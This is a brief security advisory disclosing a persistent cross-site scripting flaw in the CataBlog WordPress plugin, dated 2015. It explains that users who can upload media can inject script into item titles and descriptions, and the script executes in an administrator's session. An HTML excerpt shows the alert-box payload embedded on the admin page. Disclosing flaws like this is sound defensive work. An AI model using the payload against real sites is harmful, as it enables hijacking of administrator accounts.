Title: Catablog WP plugin persistent XSS
Author: Larry W. Cashdollar
Download: https://wordpress.org/plugins/catablog/
Date:4/20/2015
Vulnerability: XSS in Catablog on the CataBlog Library page.

A user with media upload priviledges can inject javascript into the Title and Description fields executing javascript in the context of an administrative user.

						<strong><a href="admin.php?page=catablog&amp;id=4" title="Edit CataBlog Item">'><script>alert(1);</script></a></strong>
						<div class="row-actions">
							<span><a href="admin.php?page=catablog&amp;id=4">Edit</a></span>
							<span> | </span>
							<span class="trash"><a href="admin.php?page=catablog-delete&amp;id=4&amp;_wpnonce=448e7cdbe4" class="remove_link">Delete</a></span>
						</div>
					</td>
					
					
					<td class="column-description ">'><script>alert(1);</script></td>